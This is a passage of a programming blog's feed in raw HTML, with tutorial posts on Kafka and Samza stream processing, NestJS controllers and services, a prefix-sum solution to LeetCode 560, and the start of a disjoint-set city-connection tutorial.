data-kg-toggle-state="close">
            <div class="kg-toggle-heading">
                <h4 class="kg-toggle-heading-text"><span style="white-space: pre-wrap;">Kafka as a Messaging System</span></h4>
                <button class="kg-toggle-card-icon" aria-label="Expand toggle to read content">
                    <svg id="Regular" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24">
                        <path class="cls-1" d="M23.25,7.311,12.53,18.03a.749.749,0,0,1-1.06,0L.75,7.311"/>
                    </svg>
                </button>
            </div>
            <div class="kg-toggle-content"><p><span style="white-space: pre-wrap;">Kafka is a messaging system that allows different parts of a distributed system to communicate with each other. It follows a publish-subscribe pattern, where data producers publish messages without knowing how they will be used by the subscribers. This allows for decoupling between producers and consumers.</span></p><p><span style="white-space: pre-wrap;">Consumers can express interest in specific types of data and receive only those messages. Kafka uses a commit log, which is an ordered and immutable data structure, to store and persist the data. However, as a user of Kafka, you don&apos;t need to worry about these technical details.</span></p><p><span style="white-space: pre-wrap;">Broadly speaking, the main advantage of Kafka is that it provides a central data backbone for the organization. This means that all systems within the organization can independently and reliably consume data from Kafka. It helps in creating a unified and scalable data infrastructure.</span></p></div>
        </div><p>Samza, on the other hand, is a&#xA0;<strong>stream processing framework</strong>&#xA0;that is built on top of Kafka. It provides a way to process data streams in real-time and is designed to handle high-volume and low-latency data processing. Samza allows developers to write custom processing logic using the <u>Apache Kafka Streams API</u> or the <u>Apache Samza API</u>.</p><h1 id="kafka-the-publisher">Kafka the Publisher</h1><p>There are many terms abstracted in Kafka. <strong>Topics</strong> are used to categorize messages, with producers publishing to topics and consumers subscribing and reading from topics. Topics are divided into <strong>Partitions</strong>, which represent units of parallelism and can be used for per-key processing. <strong>Brokers</strong> handle message persistence and replication, and Kafka uses <strong>Replication</strong> for fault-tolerance, choosing a leader and followers for each partition. If the leader fails, an alive follower becomes the new leader. This mechanism allows Kafka to tolerate failures.</p><h2 id="publish-subscribe-pubsub-pattern">Publish-subscribe (Pub/Sub) Pattern</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/pub-sub-architecture-overview.png.webp" class="kg-image" alt="An Introduction to Kafka and Samza for Stream Data Processing" loading="lazy" width="1840" height="1118" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/pub-sub-architecture-overview.png.webp 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/pub-sub-architecture-overview.png.webp 1000w, https://www.aspires.cc/content/images/size/w1600/2024/05/pub-sub-architecture-overview.png.webp 1600w, https://www.aspires.cc/content/images/2024/05/pub-sub-architecture-overview.png.webp 1840w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">The Publish-subscription Pattern</span></figcaption></figure><p>Pub/Sub provides a framework for exchanging messages between publishers (such as a news feed) and subscribers (such as a news reader)<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>. Note that publishers don&#x2019;t send messages to specific subscribers in a direct end-to-end manner. Instead, an intermediary is used - a Pub/Sub message broker, which groups messages into entities called channels (or topics). <sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup></p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>What is Pub/Sub? The Publish/Subscribe model explained  <a href="https://ably.com/topic/pub-sub?ref=aspires.cc">https://ably.com/topic/pub-sub</a>. <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
<li id="fn2" class="footnote-item"><p>Image is from Ably <a href="#fnref2" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<h2 id="sample-kafka-producer-publisher-code">Sample Kafka Producer (Publisher) Code</h2><p>The code defines a DataProducer class responsible for sending data to a Kafka topic. It reads a trace file line by line, parses each line into a JSON object, and determines the topic based on the &quot;type&quot; field. The data is then sent to the appropriate topic using Kafka&apos;s <code>producer.send()</code> method.</p>

<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/94f5ab09c23156381e627f1a45d31131.js"></script>
<!--kg-card-end: html-->
<h1 id="samza-the-subscriber">Samza the Subscriber</h1><p>Samza is a distributed stream processing framework developed by LinkedIn, which is designed to <u>continuously</u> compute data as it becomes available and provides <u>sub-second response</u> times. </p><p>Like Kafka, there are also some terms in Samza, a <strong>Stream</strong> is made up of partitioned sequences of messages, similar to Kafka topics. <strong>Jobs</strong> in Samza are written using the API and can process data from one or more streams. <strong>Stateful stream processing</strong> is supported in Samza, where state is stored in an in-memory key-value (KV) store local to the machine running the task. This state is replicated to a changelog stream like Kafka for fault tolerance.</p><h2 id="samza-apis">Samza APIs</h2><p>Samza provides both a high-level Streams API and a low-level Task API for processing message streams.</p><h3 id="high-level-steams-api">High Level Steams API</h3><p>The Streams API allows for operations like filtering, projection, repartitioning, joins, and windows on streams in a DAG (directed acyclic graph) format.</p><p>The code defines a class called &quot;WikipediaFeedStreamTask&quot; that implements the &quot;StreamTask&quot; interface. It processes incoming messages by converting them into a map and sends them to a Kafka output stream named &quot;wikipedia-raw&quot;.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/366febe286bcba39fa22f512a3167a77.js"></script>
<!--kg-card-end: html-->
<h3 id="low-level-task-api"><strong>Low Level Task API</strong>:</h3><p>The Task API allows for more specific processing on each data. Sample code at <strong>samza-hello-samza</strong> <sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> project on GitHub</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>The sample code on GitHub repoistory at: <a href="https://github.com/apache/samza-hello-samza/blob/master/src/main/java/samza/examples/wikipedia/task/?ref=aspires.cc">https://github.com/apache/samza-hello-samza/blob/master/src/main/java/samza/examples/wikipedia/task/</a> <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<p>The code is a Java class named <code>WikipediaParserStreamTask</code> that implements the <code>StreamTask</code> interface. It contains a <code>process</code> method that takes in an incoming message, parses it using a <code>WikipediaParser</code>, and sends the parsed result to an output stream. The <code>main</code> method generates some example strings and passes them to the <code>WikipediaParser.parseLine</code> method to demonstrate its functionality.</p>

<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/dba88690b7c43794e283dd28572b8ac3.js"></script>
<!--kg-card-end: html-->
<h2 id="explore-the-working-of-samza">Explore the working of Samza</h2><p>Apache Samza is often used alongside <u>Apache YARN</u>, which manages compute resources in clusters. Samza jobs are submitted to YARN, which allocates containers and runs Samza tasks. YARN handles resource allocation, scaling, and fault tolerance. Each task reads data from a partition in the &apos;dirty&apos; topic, processes it, and produces the results to the &apos;clean&apos; topic. Samza ensures fault tolerance by restarting failed tasks. This architecture allows for scalable, parallel processing with high availability for real-time data pipelines.</p><div class="kg-card kg-toggle-card" data-kg-toggle-state="close">
            <div class="kg-toggle-heading">
                <h4 class="kg-toggle-heading-text"><span style="white-space: pre-wrap;">Explain Apache YARN to Beginners</span></h4>
                <button class="kg-toggle-card-icon" aria-label="Expand toggle to read content">
                    <svg id="Regular" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24">
                        <path class="cls-1" d="M23.25,7.311,12.53,18.03a.749.749,0,0,1-1.06,0L.75,7.311"/>
                    </svg>
                </button>
            </div>
            <div class="kg-toggle-content"><p><span style="white-space: pre-wrap;">Imagine you have a large cluster of computers working together to process big data. YARN is like the manager of this cluster. Its main job is to allocate the work and resources to each computer in the cluster.</span></p><p><span style="white-space: pre-wrap;">Let&apos;s say you have multiple tasks to perform, like analyzing data, running calculations, or processing real-time streams. YARN takes these tasks and divides them into smaller units called containers. These containers represent pieces of work that can be executed on individual computers in the cluster.</span></p><p><span style="white-space: pre-wrap;">YARN keeps track of all the available resources in the cluster, like memory and processing power. When a task needs to be performed, YARN checks the available resources and assigns a container to do the job. It makes sure that each container gets the required resources to complete the task efficiently.</span></p><p><span style="white-space: pre-wrap;">YARN also monitors the health of the containers. If a container fails or stops working, YARN automatically restarts it on another computer, ensuring that the task continues without interruption. This helps in maintaining high availability and fault tolerance.</span></p><p><span style="white-space: pre-wrap;">One important thing about YARN is its flexibility. It can work with different data processing applications or frameworks, like Apache Hadoop, Apache Spark, or Apache Samza. This means you can use YARN to run different kinds of big data jobs on the same cluster, making the most efficient use of your resources.</span></p><p><span style="white-space: pre-wrap;">In summary, YARN is the cluster manager that allocates work to different computers, monitors their performance, automatically handles failures, and allows you to run various data processing tasks on a large scale. It makes big data processing more efficient, scalable, and reliable.</span></p></div>
        </div><h1 id="more-readings-on-play-around-with-kafka-and-samza">More Readings on Play around with Kafka and Samza</h1><p>Official example code for Apache Samza on GitHub.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/apache/samza-hello-samza?ref=aspires.cc"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - apache/samza-hello-samza: Mirror of Apache Samza</div><div class="kg-bookmark-description">Mirror of Apache Samza. Contribute to apache/samza-hello-samza development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg" alt="An Introduction to Kafka and Samza for Stream Data Processing"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">apache</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/b2f9a19292b6233c1abe3f855281557f87af2452df7efc4deeac7f471a71af1d/apache/samza-hello-samza" alt="An Introduction to Kafka and Samza for Stream Data Processing"></div></a></figure><p>Tutorial to set up an SSH tunnel to debug YARN using Amazon EMR cluster.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-ssh-tunnel.html?ref=aspires.cc"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Option 2, part 1: Set up an SSH tunnel to the primary node using dynamic port forwarding - Amazon EMR</div><div class="kg-bookmark-description">Create an SSH tunnel with the Amazon EMR primary node using dynamic port forwarding (SOCKS).</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://docs.aws.amazon.com/assets/images/favicon.ico" alt="An Introduction to Kafka and Samza for Stream Data Processing"><span class="kg-bookmark-author">Amazon EMR</span></div></div></a></figure>]]></content:encoded></item><item><title><![CDATA[An Introduction of NestJS, a Node.js web/app server framework.]]></title><description><![CDATA[This post aims to explain basic concepts in back-end programming. Although NestJS is a Node.js (JavaScript) tech-stack, you will have a thorough understanding of many concepts of designing back-end/API programming (not specifically for Node.js) after reading this post.]]></description><link>https://www.aspires.cc/intro-nestjs/</link><guid isPermaLink="false">66497323da27ac0001efd644</guid><category><![CDATA[DevOps]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Wed, 22 Nov 2023 03:59:00 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/05/backend-arch.png" medium="image"/><content:encoded><![CDATA[<img src="https://www.aspires.cc/content/images/2024/05/backend-arch.png" alt="An Introduction of NestJS, a Node.js web/app server framework."><p>Note that this post can be used as a complement of the official tutorial of Nest.js. I believe that official documents are best fit to learn a tech, so I recommend to take a step-by-step hands-on tutorial first from the following link.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://docs.nestjs.com/first-steps?ref=aspires.cc"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Documentation | NestJS - A progressive Node.js framework</div><div class="kg-bookmark-description">Nest is a framework for building efficient, scalable Node.js server-side applications. It uses progressive JavaScript, is built with TypeScript and combines elements of OOP (Object Oriented Programming), FP (Functional Programming), and FRP (Functional Reactive Programming).</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://docs.nestjs.com/apple-touch-icon-precomposed.png" alt="An Introduction of NestJS, a Node.js web/app server framework."><span class="kg-bookmark-author">Documentation | NestJS - A progressive Node.js framework</span></div></div><div class="kg-bookmark-thumbnail"><img src="http://nestjs.com/img/nest-og.png" alt="An Introduction of NestJS, a Node.js web/app server framework."></div></a></figure><p>This post aims to explain basic concepts in back-end programming. Although NestJS is a Node.js (JavaScript) tech-stack, you will have a thorough understanding of many concepts of designing back-end/API programming (not specifically for Node.js) after reading this post.</p><h1 id="overall-view">Overall View</h1><figure class="kg-card kg-image-card kg-width-wide"><img src="https://www.aspires.cc/content/images/2024/05/backend-explains.png" class="kg-image" alt="An Introduction of NestJS, a Node.js web/app server framework." loading="lazy" width="2000" height="1132" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/backend-explains.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/backend-explains.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/05/backend-explains.png 1600w, https://www.aspires.cc/content/images/2024/05/backend-explains.png 2000w" sizes="(min-width: 1200px) 1200px"></figure><h1 id="before-we-start-boilerplate-code">Before We Start:  Boilerplate Code</h1><p>Create a NestJS project using the Nest CLI tool, choose any package manager you like (I prefer&#xA0;<code>yarn</code>):</p><pre><code class="language-bash">nest new hello-nest</code></pre><p>In order to support Intellij IDEA/WebStorm, we need to apply the following configurations after opening the created project. In JetBrains IDE:</p><ul><li>Click on the dropdown menu next to the&#xA0;<strong>Run/Debug</strong>&#xA0;configurations in the top-right corner of the IDE.</li><li>Select &quot;<strong>Edit Configurations</strong>&quot; or &quot;<strong>Add Configuration</strong>&quot; option. This will open the Run/Debug Configurations dialog.</li><li>Click the &quot;+&quot; button in the top-left corner of the dialog to add a new configuration.</li><li>Choose &quot;<strong>Node.js</strong>&quot; from the list of configurations.</li><li>In the &quot;Name&quot; field, provide a meaningful name for your configuration (e.g., &quot;Nest.js&quot;).</li><li>In the &quot;JavaScript file&quot; field, enter the path to the Nest CLI file, typically&#xA0;<code>node_modules/.bin/nest</code>, or use the full path to the&#xA0;<code>nest</code>&#xA0;executable.</li><li>In the &quot;Application parameters&quot; field, enter the Nest.js CLI command you want to use, such as&#xA0;<code>start</code>&#xA0;for running your application.</li><li>Set the &quot;Working directory&quot; to the root folder (which will automatically generated by the IDE) of your Nest.js project.</li></ul><p>FYI, you can follow the detailed Node.js configuration tutorial provided by JetBrains in the following link.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.jetbrains.com/help/idea/running-and-debugging-node-js.html?ref=aspires.cc#running"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Running and debugging Node.js | IntelliJ&#xA0;IDEA</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://resources.jetbrains.com/storage/products/jetbrains/img/icons/apple-touch-icon.png" alt="An Introduction of NestJS, a Node.js web/app server framework."><span class="kg-bookmark-author">IntelliJ&#xA0;IDEA Help</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://resources.jetbrains.com/storage/products/intellij-idea/img/meta/preview.png" alt="An Introduction of NestJS, a Node.js web/app server framework."></div></a></figure><p>Well done, you have configured the&#xA0;<strong>Run/Debug</strong>&#xA0;button. You can now simply click Run button to run the server.</p><p>The default port number of NestJS created by CLI is&#xA0;<code>3000</code>. After you run the server, you can use your web browser to navigate to&#xA0;<a href="http://localhost:3000/?ref=aspires.cc">http://localhost:3000</a> and you can see the &quot;Hello World!&quot; message, which means a successfully run of NestJS.</p><h2 id="controllers">Controllers</h2><p>Controllers are the codes to receive&#xA0;<strong>requests</strong>&#xA0;and send&#xA0;<strong>responses</strong>. It works like a&#xA0;<a href="https://zh.wikipedia.org/zh-hans/%E9%8A%80%E8%A1%8C%E6%AB%83%E5%93%A1?ref=aspires.cc">bank teller</a>. Here is a piece of code of controller:</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/nestjs-controller.png" class="kg-image" alt="An Introduction of NestJS, a Node.js web/app server framework." loading="lazy" width="1600" height="913" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/nestjs-controller.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/nestjs-controller.png 1000w, https://www.aspires.cc/content/images/2024/05/nestjs-controller.png 1600w" sizes="(min-width: 720px) 720px"></figure><p>Mention that you should not write any implementation in controller layers (although you are allowed) since service layers are designed for code reuse.</p><p>Controllers should handle HTTP requests and delegate more complex tasks to s<strong>ervices</strong>,&#xA0;<strong>which</strong>&#xA0;are plain TypeScript classes that are declared as&#xA0;<code>providers</code>&#xA0;in a&#xA0;<a href="https://docs.nestjs.com/modules?ref=aspires.cc">module</a>&#xA0;(building block that helps organize and structure the code of your application) as following code.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/24835be2c4a58df23c6ab49c923c5867.js"></script>
<!--kg-card-end: html-->
<h2 id="services">Services</h2><blockquote>NestJS utilizes the concept of &quot;providers&quot; for creating and managing services. In NestJS, a provider is a class annotated with the&#xA0;<code>@Injectable()</code>decorator</blockquote><p>You may like to alternate the generated code inside&#xA0;<code>app.service.ts</code>&#xA0;to play with implementation of business logics.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/2276fa546afbac3622a834ef016398e1.js"></script>
<!--kg-card-end: html-->
<p>By visiting&#xA0;<a href="http://localhost:3000/?ref=aspires.cc">localhost:3000</a>, you get&#xA0;<code>Hello World! And the current time is 12:06:50 PM</code>.</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/nestjs-service.png" class="kg-image" alt="An Introduction of NestJS, a Node.js web/app server framework." loading="lazy" width="1600" height="947" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/nestjs-service.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/nestjs-service.png 1000w, https://www.aspires.cc/content/images/2024/05/nestjs-service.png 1600w" sizes="(min-width: 720px) 720px"></figure><p>You should implement any business logics inside Services. As the following code given, the&#xA0;<code>getCurrentTime()</code>&#xA0;method get a current local time. It is declared with&#xA0;<strong>private</strong>&#xA0;means the method can only be called inside&#xA0;<code>app.service.ts</code>.&#xA0;</p><blockquote>Method Scoping (annotated with private, public, ...) is important since it provides functions of encapsulation, security. It also create a maintainable code.</blockquote><p><strong>Here is why it provides a maintainable code</strong>: Image that you are at a bank. You have a business account and an individual account. You go to the business counter:&#xA0;<code>/business/deposit</code>&#xA0;and you sign a form (request JSON)</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/35b71e431694561400917ade4c7c980c.js"></script>
<!--kg-card-end: html-->
<p>The counter teller knows that you want to&#xA0;<strong>deposit 1000 USD</strong>&#xA0;to account&#xA0;<strong>99887766</strong>, and you also provide a legal&#xA0;<strong>signature</strong>&#xA0;(authentication), which means you are actually you (although it can be forfeit by some approaches such as 51% attack).</p><p>The service code inside&#xA0;<code>business.service.ts</code>&#xA0;may be look like:</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/8c14a0cefbc42b83284c8fa7af146876.js"></script>
<!--kg-card-end: html-->
<p>The&#xA0;<strong>private</strong>&#xA0;scope states that&#xA0;<code>transaction()</code>&#xA0;can be only used in&#xA0;<code>business.service.ts</code>, which means it handles only business services. When we implement&#xA0;<code>individual.service.ts</code>, there can also be a private&#xA0;<code>transaction()</code>&#xA0;method for individual services, which creates a maintainability. (otherwise we may write code&#xA0;<code>transaction_business()</code>&#xA0;and&#xA0;<code>transaction_individual()</code>&#xA0;)</p><h1 id="routing-mechanism-and-restful-convention">Routing Mechanism and RESTful convention</h1><p>Controllers need&#xA0;<strong>routing</strong>&#xA0;mechanism (there are different bank services, individual, business, ...). Routing is implemented by concating of&#xA0;<strong>URL</strong>. A&#xA0;<strong>RESTful</strong>&#xA0;design (convention) of URL is like:</p><pre><code class="language-bash">/account/create
/account/{id}/delete
/account/{id}/update
/account/{id}
/item/{id}
/items
/item/page/10</code></pre><p>Where&#xA0;<code>{id}</code>&#xA0;is user id for any individual users, such as&#xA0;<code>1145141919810</code>. The URLs in the previous code blocks represents&#xA0;<strong>create</strong>&#xA0;a user,&#xA0;<strong>delete</strong>&#xA0;a user according to his/hers id, such as&#xA0;<code>/account/1145141919810/delete</code>,&#xA0;<strong>update</strong>&#xA0;a user according to id, and&#xA0;<strong>read</strong>&#xA0;user information (such as email) according to a id. Generally speaking, what server&apos;s job, commonly, are&#xA0;<strong>C</strong>reate,&#xA0;<strong>R</strong>ead,&#xA0;<strong>U</strong>pdate and&#xA0;<strong>D</strong>elete (CRUD).</p><p><code>/items/{id}</code>&#xA0;demostrates routing. The manipulation within the Controller that listening on the URL starts with&#xA0;<code>item</code>&#xA0;is item-related. Image an online shopping website, if we want to get information of a specific item by its item id.</p><p><code>/items</code>, as you guess, this URL is for retrieving all items (products) as a huge list.</p><p>Similarly, follow the RESTful convention,&#xA0;<code>/item/page/10</code>&#xA0;retrieving a specific page (the 10th page) of a collection of items. It works for pagination of a list of products in an online shopping website, since using one page to display all products is slow.</p><blockquote>Note: in a modern front-end back-end separation design of web applications. These URLs returns a JSON rather than a rendered web page. Front-end back-end separation design is much similar to the pattern of Mobile/Embedded Application design.</blockquote>]]></content:encoded></item><item><title><![CDATA[Prefix Sum with HashMap: Time Complexity Optimization]]></title><description><![CDATA[A very cool way of using Prefix Sum with Hash-map is shown in this post. I am going to break down this LeetCode 560 problem to reveal the idea of lowering down the time complexity by adopting Hash-map (or dictionary in Python).]]></description><link>https://www.aspires.cc/prefix-sum/</link><guid isPermaLink="false">66497323da27ac0001efd643</guid><category><![CDATA[Algorithms]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Sat, 18 Nov 2023 03:18:00 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/05/prefix-sum-hashmap.png" medium="image"/><content:encoded><![CDATA[<h1 id="leetcode-560">LeetCode 560</h1><figure class="kg-card kg-bookmark-card kg-card-hascaption"><a class="kg-bookmark-container" href="https://leetcode.com/problems/subarray-sum-equals-k/?ref=aspires.cc"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Subarray Sum Equals K - LeetCode</div><div class="kg-bookmark-description">Can you solve this real interview question? Subarray Sum Equals K - Given an array of integers nums and an integer k, return the total number of subarrays whose sum equals to k. A subarray is a contiguous non-empty sequence of elements within an array. Example 1: Input: nums = [1,1,1], k = 2
Output: 2 Example 2: Input: nums = [1,2,3], k = 3
Output: 2 Constraints: * 1 &lt;= nums.length &lt;= 2 * 104 * -1000 &lt;= nums[i] &lt;= 1000 * -107 &lt;= k &lt;= 107</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://leetcode.com/favicon.ico" alt="Prefix Sum with HashMap: Time Complexity Optimization"><span class="kg-bookmark-author">LeetCode</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://leetcode.com/static/images/LeetCode_Sharing.png" alt="Prefix Sum with HashMap: Time Complexity Optimization"></div></a><figcaption><img src="https://www.aspires.cc/content/images/2024/05/prefix-sum-hashmap.png" alt="Prefix Sum with HashMap: Time Complexity Optimization"><p><span style="white-space: pre-wrap;">LeetCode 560</span></p></figcaption></figure><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/leetcode-560.png" class="kg-image" alt="Prefix Sum with HashMap: Time Complexity Optimization" loading="lazy" width="2000" height="1122" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/leetcode-560.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/leetcode-560.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/05/leetcode-560.png 1600w, https://www.aspires.cc/content/images/2024/05/leetcode-560.png 2000w" sizes="(min-width: 720px) 720px"></figure><p>Reviewing question 560, an array&#xA0;<code>nums</code>&#xA0;and a target&#xA0;<code>k</code>&#xA0;is given to determine the number of sub-arrays&#xA0;<code>res</code>&#xA0;which having sum of interval equals&#xA0;<code>k</code>. Such that, giving array&#xA0;<code>nums = [1, 1, 1, 1, 1, 1]</code>&#xA0;and&#xA0;<code>k = 4</code>. The result&#xA0;<code>res</code>&#xA0;will be 3, target sub-array set contains&#xA0;<code>nums[0:3]</code>,&#xA0;<code>nums[1:4]</code>&#xA0;and&#xA0;<code>nums[2:5]</code>.</p><h2 id="adopting-prefix-sum">Adopting Prefix Sum</h2><p>Since the time complexity of calculating sum of interval for a specific interval is&#xA0;$O(n)$:</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/69488768caba2034c9d55c100d87925d.js"></script>
<!--kg-card-end: html-->
<p>If we want to calculate interval of sum more than one time, such as the problem 560, we should utilize Prefix Sum, which, $O(n)$ for constructing <code>pref</code> array and $O(1)$ for querying a specific interval, say <code>[L, R]</code>:</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/e99d73bc73541f98e73bf02a9658490a.js"></script>
<!--kg-card-end: html-->
<h2 id="back-to-the-problem">Back to the Problem</h2><p>In the problem, we need to check sum of intervals of each specific pair of L and R, since there are negative elements in <code>nums</code>.</p><p>The brute force code can be easily written using two for loop, which incurs a square time complexity $O(n^2)$.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/b55d303faeed7c86ee2b06f15a0d3999.js"></script>
<!--kg-card-end: html-->
<p>From observation, we notice that: </p><p>When we considering each R, to find sum of interval starts with each L ranging from 0 to R, a linear time is needed to deduct the <code>pref[R]</code> by each <code>pref[L]</code>.</p><p>Since scanning each <code>pref[L]</code> linearly is a little bit waste of time, so we can consider utilizing some spaces to trade time. We can adopt a dictionary (HashMap).</p><p>Consider that:</p><ul><li>In the inner for loop of L, we want to know how many L&apos;s can satisfy <code>pref[R] - pref[L] == k</code>, equivalent to <code>pref[L] == pref[R] - k</code>.</li><li>We adopt a dictionary <code>d</code> to maintain number of L&apos;s having Prefix Sum as the key of <code>d</code>, hence <code>d[i]</code> means number of L satisfying <code>pref[L] == i</code>.</li><li>Then we break the inner loop by <code>res += d[pref[R] - k]</code>, that&apos;s wise, isn&apos;t it?</li><li>Finally we update the dictionary <code>d</code> by the loop of R (refer to the following code).</li><li>Note that we should initalize <code>d</code> by <code>d = {0: 1}</code>, think about why we should do so. (That is similar to we initialize pref using <code>pref=[0]</code>. Because there can be a sum of interval starting from the first element)</li></ul>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/d1275c11ab08bed2457302a2398ab1b3.js"></script>
<!--kg-card-end: html-->
<p>We have cancelled out <code>pref[L]</code>. We can also discard <code>pref[R]</code>. The reason of it is R is in the outer loop, and it can totally combined with the previous loop for calculating <code>pref</code>. We also discard the <code>pref</code> array to make it calculate-on-use.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/41b1a05957fc7d3020eb3cec479ff406.js"></script>
<!--kg-card-end: html-->
<h1 id="conclusion">Conclusion</h1><p>We use a dictionary (HashMap) to replace the inner for loop for variable L, and we modify the code to eliminate the need for the &apos;pref&apos; array. As a result, the time complexity is reduced from quadratic time to linear time. This technique is quite useful and can be applied to more LeetCode problems.</p>]]></content:encoded></item><item><title><![CDATA[Disjoint Set: City Connection Problem]]></title><description><![CDATA[Disjoint-set (or Union-Find) is a data structure used for managing the membership of elements in sets. It is implemented as a forest, where each tree represents a set and the nodes in the tree represent the elements in the corresponding set.]]></description><link>https://www.aspires.cc/introduction-to-disjoint-set/</link><guid isPermaLink="false">66497323da27ac0001efd645</guid><category><![CDATA[Algorithms]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Wed, 18 Oct 2023 04:20:00 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/05/disjoint-set.png" medium="image"/><content:encoded><![CDATA[<h1 id="city-connection-problem">City Connection Problem</h1><img src="https://www.aspires.cc/content/images/2024/05/disjoint-set.png" alt="Disjoint Set: City Connection Problem"><p>Let us consider a scenario of connecting cities with highways. The question is how we can determine if it is possible to travel from one city to another only by highways. To solve this problem, we can use the Union-Find Disjoint Sets, also known as disjoint sets.</p><h2 id="reading-in-roads-info">Reading in Roads Info</h2><p>Since we are focusing on the interconnections between cities on the map, we will denote two interconnected cities as <code>X &#x2013;- Y</code>, where X and Y represent the city names. For example:</p><pre><code class="language-other">1 -- 3
1 -- 2
2 -- 4
3 -- 4
5 -- 6
6 -- 7
</code></pre><p>The notations&#xA0;<code>--</code>&#xA0;indicate a interconnection of each pair of cities. We can build a graph according to the specification, like this:</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/disjoint-1.png" class="kg-image" alt="Disjoint Set: City Connection Problem" loading="lazy" width="381" height="298"></figure><p>In this graph, if we want to check if city 4 is connected with city 7, we can use search algorithms such as Depth-first Search (DFS) or Breadth-first Search (BFS). If we want to make sure we cannot go to city 7 from city 4, we must traverse all around the left <code>1-2-4-3-1</code> trace. The time complexity of the checking is $O(N)$.</p><p>If we are focusing on the knowledge about if they are interconnected, the more time-efficient way is to build disjoint sets, then we can lower down the time complexity with the help of trees.</p><h1 id="how-disjoint-set-works">How Disjoint Set works</h1><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/disjoint-2.png" class="kg-image" alt="Disjoint Set: City Connection Problem" loading="lazy" width="750" height="674" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/disjoint-2.png 600w, https://www.aspires.cc/content/images/2024/05/disjoint-2.png 750w" sizes="(min-width: 720px) 720px"></figure><p>Modeling this problem using the graph theory, we can regard each cities as a node, as shown in the figure. At first, we can initiate each node having their parent node as itself since disjoint sets work as a forest (trees) data structure (tree have a root node). In the current scenario, every node is a root node and there are 7 trees in this figure, which can easily illustrated by the Python code:</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/94d9b5a2e764735a36887dd78d269bc9.js"></script>
<!--kg-card-end: html-->
